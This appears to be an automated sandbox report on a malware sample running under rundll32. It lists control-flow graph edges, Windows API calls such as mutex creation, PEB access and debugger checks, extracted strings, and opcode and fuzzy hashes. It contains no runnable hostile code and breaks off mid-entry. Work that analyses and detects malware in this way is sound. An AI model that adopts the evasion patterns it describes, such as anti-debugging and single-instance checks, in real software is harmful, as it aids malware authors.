7f2c47b1-7f2c47ba 5510->5516 5511->5516 5517 7f2c4963 5512->5517 5513->5517 5515->5507 5516->5479 5517->5507 5522 7f2c4b3d-7f2c4b43 5518->5522 5519->5522 5524 7f2c4b45-7f2c4b69 5522->5524 5525 7f2c4b77 5522->5525 5524->5525 5526 7f2c4b6b-7f2c4b75 5524->5526 5527 7f2c4b81-7f2c4b8d 5525->5527 5526->5527 5528 7f2c4b8f-7f2c4b9c 5527->5528 5529 7f2c4bc4-7f2c4bcd 5527->5529 5530 7f2c4b9e-7f2c4bc2 5528->5530 5531 7f2c4be7-7f2c4bee 5528->5531 5532 7f2c4bcf-7f2c4bd5 5529->5532 5533 7f2c4bd7-7f2c4bdc 5529->5533 5530->5529 5530->5531 5535 7f2c4c0f-7f2c4c15 5531->5535 5536 7f2c4bf0-7f2c4c0d 5531->5536 5534 7f2c4bdf-7f2c4be5 5532->5534 5533->5534 5537 7f2c4c5d-7f2c4c76 5534->5537 5538 7f2c4c2c 5535->5538 5539 7f2c4c17-7f2c4c1e 5535->5539 5536->5537 5537->5500 5541 7f2c4c7c-7f2c4cd4 call 7f2f0b50 5537->5541 5540 7f2c4c36-7f2c4c45 5538->5540 5539->5538 5542 7f2c4c20-7f2c4c2a 5539->5542 5543 7f2c4c47-7f2c4c51 5540->5543 5544 7f2c4c53 5540->5544 5547 7f2c4cd6-7f2c4ce0 5541->5547 5548 7f2c4ce2 5541->5548 5542->5540 5543->5537 5544->5537 5549 7f2c4cec-7f2c4d05 5547->5549 5548->5549 5549->5458
                                                APIs
                                                • PathIsDirectoryW.SHLWAPI(?), ref: 7F2C45AB
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectoryPath
                                                • String ID:
                                                • API String ID: 1580926078-0
                                                • Opcode ID: 3c014b7102b19b0b03628e6607a72720bd5937db0b420c47e5d9adc5f6b12f06
                                                • Instruction ID: 16f9688657dbc4a62959d2c58d8e90f4330a47c077342488678105d0052048f9
                                                • Opcode Fuzzy Hash: 3c014b7102b19b0b03628e6607a72720bd5937db0b420c47e5d9adc5f6b12f06
                                                • Instruction Fuzzy Hash: F7B1D174D09269CBDB25CF59C894BAEBBB2BF48300F2482DAD459A7345D734AE81CF44
                                                Function 7F2EDDF9 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5550 7f2eddf9-7f2ede7b call 7f2f0b50 call 7f2afcc0 5556 7f2ede9e-7f2edefb GetPEB 5550->5556 5557 7f2ede7d-7f2ede9a call 7f2c4d30 5550->5557 5559 7f2edf01-7f2edf6e 5556->5559 5557->5556 5561 7f2edf7c 5559->5561 5562 7f2edf70-7f2edf7a 5559->5562 5563 7f2edf86-7f2edf95 5561->5563 5562->5563 5564 7f2edf9b-7f2edfa4 5563->5564 5565 7f2ee0b1-7f2ee0e1 5563->5565 5566 7f2edfa7-7f2edfc0 5564->5566 5565->5559 5567 7f2ee0e7 5565->5567 5566->5565 5568 7f2edfc6-7f2edff3 5566->5568 5569 7f2ee0f1-7f2ee123 call 7f2b77a0 5567->5569 5570 7f2edffd-7f2ee01d 5568->5570 5579 7f2ee12d-7f2ee1e2 GetPEB 5569->5579 5580 7f2ee125-7f2ee127 ExitProcess 5569->5580 5572 7f2ee01f-7f2ee02b 5570->5572 5573 7f2ee02d-7f2ee044 5570->5573 5575 7f2ee046-7f2ee050 5572->5575 5573->5570 5573->5575 5577 7f2ee0ac 5575->5577 5578 7f2ee052-7f2ee0aa 5575->5578 5577->5566 5578->5569 5581 7f2ee1e8-7f2ee255 5579->5581 5582 7f2ee257-7f2ee261 5581->5582 5583 7f2ee263 5581->5583 5584 7f2ee26d-7f2ee27c 5582->5584 5583->5584 5585 7f2ee398-7f2ee3c8 5584->5585 5586 7f2ee282-7f2ee28b 5584->5586 5585->5581 5588 7f2ee3ce 5585->5588 5587 7f2ee28e-7f2ee2a7 5586->5587 5587->5585 5589 7f2ee2ad-7f2ee2da 5587->5589 5590 7f2ee3d8-7f2ee7af CreateThread call 7f2a1e40 call 7f2a20b0 5588->5590 5591 7f2ee2e4-7f2ee304 5589->5591 5605 7f2ee864-7f2ee881 5590->5605 5606 7f2ee7b5-7f2ee7c2 5590->5606 5593 7f2ee306-7f2ee337 5591->5593 5594 7f2ee314-7f2ee32b 5591->5594 5597 7f2ee339-7f2ee391 5593->5597 5598 7f2ee393 5593->5598 5594->5591 5597->5590 5598->5587 5609 7f2ee885-7f2ee88c 5605->5609 5607 7f2ee7c4-7f2ee7ce 5606->5607 5608 7f2ee7d0 5606->5608 5610 7f2ee7da-7f2ee7e1 5607->5610 5608->5610 5612 7f2ee7ef 5610->5612 5613 7f2ee7e3-7f2ee7ed 5610->5613 5614 7f2ee7f9-7f2ee805 5612->5614 5613->5614 5615 7f2ee807-7f2ee820 5614->5615 5616 7f2ee822-7f2ee846 5614->5616 5618 7f2ee862 5615->5618 5617 7f2ee848-7f2ee85c 5616->5617 5616->5618 5617->5618 5618->5609
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aullrem
                                                • String ID:
                                                • API String ID: 3758378126-0
                                                • Opcode ID: 21e792343644fa7631dbbc7c0d106755fa6cedf6ea2ec7d0f1168c3704c7231d
                                                • Instruction ID: 0f6565ecca60fff3790df94ad0e6deaa4fd8beae2b47d7092b2a3ca5721d20db
                                                • Opcode Fuzzy Hash: 21e792343644fa7631dbbc7c0d106755fa6cedf6ea2ec7d0f1168c3704c7231d
                                                • Instruction Fuzzy Hash: 7A91D374E052688FDB64CF68C894BD9BBB6BF88304F2481D9D80DA7356D731AA85CF41
                                                Function 7F2DADB0 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5619 7f2dadb0-7f2dadea GetPEB 5620 7f2daded-7f2dae36 5619->5620 5621 7f2dae38-7f2dae3f 5620->5621 5622 7f2dae41 5620->5622 5623 7f2dae48-7f2dae54 5621->5623 5622->5623 5624 7f2dae5a-7f2dae60 5623->5624 5625 7f2daf16-7f2daf34 5623->5625 5627 7f2dae63-7f2dae76 5624->5627 5625->5620 5626 7f2daf3a 5625->5626 5628 7f2daf41-7f2daf59 GetSystemInfo 5626->5628 5627->5625 5629 7f2dae7c-7f2dae97 5627->5629 5630 7f2dae9e-7f2daeb5 5629->5630 5631 7f2daebf-7f2daed0 5630->5631 5632 7f2daeb7-7f2daed9 5630->5632 5631->5630 5634 7f2daedb-7f2daf0f 5632->5634 5635 7f2daf11 5632->5635 5634->5628 5635->5627
                                                APIs
                                                • GetSystemInfo.KERNEL32(?), ref: 7F2DAF47
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                                                • Instruction ID: 4d92db9f4c8036f7c7b548659aea46d72b5e136953edc7face11e05d094fd94b
                                                • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                                                • Instruction Fuzzy Hash: FD617FB8E052599FCB44CF98C590AEDFBB1FF48304F2481AAE815AB346D735AA41CF54
                                                Function 7F2B77A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 331synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2137 7f2b77a0-7f2b79a0 2138 7f2b7a3f-7f2b7a54 CreateMutexA 2137->2138 2139 7f2b79a6-7f2b79a9 2137->2139 2140 7f2b7a5a-7f2b7ab3 call 7f2d8fa0 2138->2140 2141 7f2b7b44-7f2b7b4f GetLastError 2138->2141 2142 7f2b79d2-7f2b79d8 2139->2142 2143 7f2b79b0-7f2b79d0 2139->2143 2144 7f2b7a00-7f2b7a12 2139->2144 2145 7f2b7a14-7f2b7a39 2139->2145 2155 7f2b7ac9 2140->2155 2156 7f2b7ab5 2140->2156 2147 7f2b7ce0-7f2b7cf3 2141->2147 2148 7f2b7b55-7f2b7bd2 call 7f2f0b50 2141->2148 2149 7f2b79da-7f2b79eb 2142->2149 2150 7f2b79ed-7f2b79f5 2142->2150 2143->2138 2144->2138 2145->2138 2154 7f2b7cf8-7f2b7cfc 2147->2154 2160 7f2b7be9-7f2b7c02 2148->2160 2161 7f2b7bd4-7f2b7bd8 2148->2161 2151 7f2b79f8-7f2b79fe 2149->2151 2150->2151 2151->2138 2162 7f2b7ad0-7f2b7ae9 2155->2162 2158 7f2b7ac0-7f2b7ac7 2156->2158 2159 7f2b7ab7-7f2b7abe 2156->2159 2158->2162 2159->2155 2159->2158 2167 7f2b7cb6-7f2b7cde CloseHandle 2160->2167 2163 7f2b7bda-7f2b7bde 2161->2163 2164 7f2b7c07-7f2b7c0b 2161->2164 2165 7f2b7aeb 2162->2165 2166 7f2b7aff 2162->2166 2169 7f2b7c9f-7f2b7cb3 2163->2169 2170 7f2b7be4 2163->2170 2173 7f2b7c0d-7f2b7c14 2164->2173 2174 7f2b7c16 2164->2174 2171 7f2b7aed-7f2b7af4 2165->2171 2172 7f2b7af6-7f2b7afd 2165->2172 2168 7f2b7b06-7f2b7b0c 2166->2168 2167->2154 2176 7f2b7b0e-7f2b7b3a call 7f2f0b50 2168->2176 2177 7f2b7b3d-7f2b7b3f 2168->2177 2169->2167 2170->2167 2171->2166 2171->2172 2172->2168 2175 7f2b7c1d-7f2b7c26 2173->2175 2174->2175 2178 7f2b7c28-7f2b7c2f 2175->2178 2179 7f2b7c31 2175->2179 2176->2177 2177->2154 2181 7f2b7c38-7f2b7c3e 2178->2181 2179->2181 2183 7f2b7c49 2181->2183 2184 7f2b7c40-7f2b7c47 2181->2184 2185 7f2b7c50-7f2b7c59 2183->2185 2184->2185 2186 7f2b7c5b-7f2b7c6d 2185->2186 2187 7f2b7c6f-7f2b7c72 2185->2187 2188 7f2b7c7a-7f2b7c9d 2186->2188 2187->2188 2188->2167
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7F2B7A47
                                                • GetLastError.KERNEL32 ref: 7F2B7B44
                                                • CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7F2B7CBA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateErrorHandleLastMutex
                                                • String ID: *$9mD$B$u${
                                                • API String ID: 4294037311-4130828584
                                                • Opcode ID: ca545504c48f64512df48a8f5abc83049d9d886d8cfa1716e9e3b32693bf2d98
                                                • Instruction ID: df83296dfbb5073f5e1950e977273f37b4460a1257b9e03d00ea2e8a4de176c8
                                                • Opcode Fuzzy Hash: ca545504c48f64512df48a8f5abc83049d9d886d8cfa1716e9e3b32693bf2d98
                                                • Instruction Fuzzy Hash: 45F168B5C15259CEDB14CFAAC8807ADBBB5BF48310F28819ED459EB381E7385A81CF50
                                                Function 7F2ECAF0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 289COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7F2ECCEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySystem
                                                • String ID: )$2$?$m$n $e
                                                • API String ID: 2188284642-1749247282
                                                • Opcode ID: 51b56c395a024250a4073c4437139e004d60a93ebb92fd722d19d22840089451
                                                • Instruction ID: 776acad3e8470b557e586d512c53040fba7a0e68e5aec1f2c34e18f9f3dfa174
                                                • Opcode Fuzzy Hash: 51b56c395a024250a4073c4437139e004d60a93ebb92fd722d19d22840089451
                                                • Instruction Fuzzy Hash: C5F15575D046688BDB24CF6AC8857EDBBB6BF49310F2880DED049A7391DB742A80CF50
                                                Function 7F2D9280 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 204COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4021 7f2d9280-7f2d9495 call 7f2d95f0 4024 7f2d9497-7f2d949d GetShellWindow 4021->4024 4025 7f2d94a1-7f2d94ab 4021->4025 4024->4025 4026 7f2d94ad-7f2d94be 4025->4026 4027 7f2d94c0-7f2d94ec call 7f2f0b50 4025->4027 4028 7f2d950e-7f2d9526 4026->4028 4033 7f2d94ee-7f2d94f5 4027->4033 4034 7f2d94f7 4027->4034 4031 7f2d9528-7f2d9534 4028->4031 4032 7f2d9536-7f2d9539 4028->4032 4035 7f2d953e-7f2d956d 4031->4035 4032->4035 4036 7f2d94fe-7f2d9507 4033->4036 4034->4036 4037 7f2d956f-7f2d9576 4035->4037 4038 7f2d9578 4035->4038 4036->4028 4039 7f2d957f-7f2d9585 4037->4039 4038->4039 4040 7f2d9587-7f2d958e 4039->4040 4041 7f2d9590 4039->4041 4042 7f2d9597-7f2d95ea 4040->4042 4041->4042
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ShellWindow
                                                • String ID: 2$MNo name attribute $Q$\$c
                                                • API String ID: 2831631499-3960561890
                                                • Opcode ID: df15c54758d55a2486842286860a07e44bf66d8937764b53ac50db34b6a41229
                                                • Instruction ID: 7ef0a8fbfb428574359e5393266d0f554eae11b5f46970833ee7ccfd6101f6b3
                                                • Opcode Fuzzy Hash: df15c54758d55a2486842286860a07e44bf66d8937764b53ac50db34b6a41229
                                                • Instruction Fuzzy Hash: 9DA13879D04298DEDB14CFAAC4807ADBBB5BF49310F28819EE448E7382DB745A84CF55

                                                Non-executed Functions

                                                Function 7F30C640 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: d3001ef3cf89f399947220cd0e7127f75b8a3c0316098ccd1285a7d1d75c0da8
                                                • Instruction ID: ba1f78f15deb92840aadbc0f9144345162ef2144378e49224978c087ac1dad67
                                                • Opcode Fuzzy Hash: d3001ef3cf89f399947220cd0e7127f75b8a3c0316098ccd1285a7d1d75c0da8
                                                • Instruction Fuzzy Hash: D8D21871E082298FDB65DE28DD407DAB7FAEB44345F1445EAD80EE7240EB74AE858F40
                                                Function 7F30AA7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,2000000B,7F30AD9A,00000002,00000000,?,?,?,7F30AD9A,?,00000000), ref: 7F30AB15
                                                • GetLocaleInfoW.KERNEL32(?,20001004,7F30AD9A,00000002,00000000,?,?,?,7F30AD9A,?,00000000), ref: 7F30AB3E
                                                • GetACP.KERNEL32(?,?,7F30AD9A,?,00000000), ref: 7F30AB53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: ee1a27c23b73d0427a515dc15501f7da699d7ddac5d3a4f252e05b59f8a61039
                                                • Instruction ID: 1d0ff0f11ea3e9f49c92e7eeb44d51fedb365f7526432fd9631b1ee8ad77c199
                                                • Opcode Fuzzy Hash: ee1a27c23b73d0427a515dc15501f7da699d7ddac5d3a4f252e05b59f8a61039
                                                • Instruction Fuzzy Hash: 0B21A726600205ABEF15AF75EA00B8773BBEF44A60B568536ED27DB144E732E941C3B0
                                                Function 7F30AC51 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 7F30AD5D
                                                • IsValidCodePage.KERNEL32(00000000), ref: 7F30ADA6
                                                • IsValidLocale.KERNEL32(?,00000001), ref: 7F30ADB5
                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 7F30ADFD
                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 7F30AE1C
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                • String ID:
                                                • API String ID: 415426439-0
                                                • Opcode ID: 7c588683804c99b50583f2c45b8b9a7d06670bf8d9ee1778005b86ec9f00608e
                                                • Instruction ID: 67c73ae166fee6db1fbff414f804e65fc61629d7ad4f10854ec5dd0cd9005a45
                                                • Opcode Fuzzy Hash: 7c588683804c99b50583f2c45b8b9a7d06670bf8d9ee1778005b86ec9f00608e
                                                • Instruction Fuzzy Hash: A7515076A00709ABDF10EFA5DC50AAF77BAFF09702F14456AE922EB150E770A9058770
                                                Function 7F30A2ED Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetACP.KERNEL32(?,?,?,?,?,?,7F302932,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F30A3AE
                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7F302932,?,?,?,00000055,?,-00000050,?,?), ref: 7F30A3D9
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F30A53C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$CodeInfoLocalePageValid
                                                • String ID: utf8
                                                • API String ID: 607553120-905460609
                                                • Opcode ID: cc17d6c39484c8a79ced0d5fa31f86d95448781d249ea04220351622d83d2ba4
                                                • Instruction ID: 6130de8f4f82b4d4ec33d1afadd7c018f7c2e8589094b468e7c9e9a44367a387
                                                • Opcode Fuzzy Hash: cc17d6c39484c8a79ced0d5fa31f86d95448781d249ea04220351622d83d2ba4
                                                • Instruction Fuzzy Hash: AD71F675A00306AAEF15BB75EC45BAB73BEEF04310F11456BE926DB280E774E9418770
                                                Function 7F304EFE Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
                                                • Instruction ID: 09f0f474eb641d2599220ea0315527b009cf32fb5784ebd441081dea70b07e94
                                                • Opcode Fuzzy Hash: 30751736de5bae8b5dd7a50bf91012a2f7c7320bebe9c7af6a7a9e7fe88613c8
                                                • Instruction Fuzzy Hash: FFB14932D043469FDF16DF68C8817EEBBBBEF55350F14826BE801AB245D275A901CBA0
                                                Function 7F2F1417 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F2F1423
                                                • IsDebuggerPresent.KERNEL32 ref: 7F2F14EF
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F2F1508
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 7F2F1512
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: 132a71f8cdf910514b7eb7f802cfa1c937740d9b6befd05c118326ce5235774b
                                                • Instruction ID: 493b200ae713eeee14fa543aa620f305ab918ff62f6b8ff80901937dfa371c22
                                                • Opcode Fuzzy Hash: 132a71f8cdf910514b7eb7f802cfa1c937740d9b6befd05c118326ce5235774b
                                                • Instruction Fuzzy Hash: 503118BAD113189BDB10DFA0C9497CDBBF8AF08310F5041AAE50DAB250E7719B84CF55
                                                Function 7F2CDAC0 Relevance: 5.5, Strings: 3, Instructions: 1787COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: <$@$`
                                                • API String ID: 0-4173208228
                                                • Opcode ID: 244398bf0defb2837aa7cf54e8343dc9d8de9f903ac751a2b64d07d4a89b8504
                                                • Instruction ID: a9cdceefbd63a4626b5a8cd463040227c08e1f9971c2f06c3e09125e4529dcc9
                                                • Opcode Fuzzy Hash: 244398bf0defb2837aa7cf54e8343dc9d8de9f903ac751a2b64d07d4a89b8504
                                                • Instruction Fuzzy Hash: 24338EB8E056698FCB65CF18C890BD9BBB1BF89304F1082DAD949A7355D730AE81CF54
                                                Function 7F30A700 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 7F301EEC: GetLastError.KERNEL32(?,00000008,7F30699C), ref: 7F301EF0
                                                  • Part of subcall function 7F301EEC: SetLastError.KERNEL32(00000000,00000000,0000000B,000000FF), ref: 7F301F92
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A754
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A79E
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 7F30A864
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale$ErrorLast
                                                • String ID:
                                                • API String ID: 661929714-0
                                                • Opcode ID: 438ee4d1117e81455cdeab48b0ddecbd06095617b4175b9cde0f2f2aa02e605c
                                                • Instruction ID: 77baf45307c9f860b6e680a529960bca79a1114effa04b32bb3fd215d1854c23
                                                • Opcode Fuzzy Hash: 438ee4d1117e81455cdeab48b0ddecbd06095617b4175b9cde0f2f2aa02e605c
                                                • Instruction Fuzzy Hash: 09617172A10307DBDF19EE28DD81FAA77BAEF04311F10417AD926CA584E734E952CB64
                                                Function 7F2F52A3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 7F2F539B
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 7F2F53A5
                                                • UnhandledExceptionFilter.KERNEL32(7F314F78,?,?,?,?,?,00000000), ref: 7F2F53B2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: bbe68f6a8de26c47c8cbfd030480f3130ddc54569ae1c14e9208091a7270c12a
                                                • Instruction ID: 79b3ac47f9a90e13bcfb9a24d7cf7fa0d8f5a302db343d61dcc36ae76463422c
                                                • Opcode Fuzzy Hash: bbe68f6a8de26c47c8cbfd030480f3130ddc54569ae1c14e9208091a7270c12a
                                                • Instruction Fuzzy Hash: C231D3759113289BCB21DF68C88878DBBF8AF08320F6041EAE41DA7290E7749B858F55
                                                Function 7F2B8F30 Relevance: 4.3, Strings: 3, Instructions: 553COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$PE
                                                • API String ID: 0-2458287169
                                                • Opcode ID: edc081acf4b778692fdc18be92724da21dfa7da1bdb1f6dd02c32c1083faaa5f
                                                • Instruction ID: 2c7e6f15c13ae4bf4b4e838ecc887f5309a00a5dc921bfdc43c7559b467e666f
                                                • Opcode Fuzzy Hash: edc081acf4b778692fdc18be92724da21dfa7da1bdb1f6dd02c32c1083faaa5f
                                                • Instruction Fuzzy Hash: 4852A274E05229DFDB24CF98C990BDDBBB1BF49304F2081A9D809AB345E735AA85CF50
                                                Function 7F2CFD40 Relevance: 4.2, Strings: 2, Instructions: 1746COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                • Opcode ID: c18775905297aa4ba7d4a1771aabb80b6da8ca3c0a74c94f42462fe224d58223
                                                • Instruction ID: 0aba77b95f4654a730cb412b6dcea1b8d3f64d60f8caebd78c9307b49f5e1c4d
                                                • Opcode Fuzzy Hash: c18775905297aa4ba7d4a1771aabb80b6da8ca3c0a74c94f42462fe224d58223
                                                • Instruction Fuzzy Hash: 8A238DB4E052698FDB69CF58C890BD9BBB1BF89304F1081DAD849A7355DB30AE81CF54
                                                Function 7F2D1EB0 Relevance: 3.9, Strings: 2, Instructions: 1432COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2944640918.000000007F290000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F290000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7f290000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: |J$D
                                                • API String ID: 0-12622807
                                                • Opcode ID: 65a96f57a5017fce4e3eed641b1a20551ed177edf3e3d2307ebf935a40999b78
